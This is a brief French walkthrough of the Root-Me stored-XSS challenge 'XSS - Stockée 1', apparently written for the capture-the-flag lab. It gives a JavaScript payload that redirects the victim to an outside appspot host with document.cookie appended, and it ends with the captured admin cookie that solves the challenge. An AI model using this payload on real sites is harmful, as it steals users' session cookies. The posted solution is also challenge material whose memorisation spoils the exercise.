# XSS - Stockée 1 https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stockee-1 Le champ texte est vulnérable à des injections de balise HTML et permet ainsi l'injection de code Javascript. window.location="http://sandbox-209707.appspot.com/" + document.cookie; Pour enfin récupérer le cookie: /ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6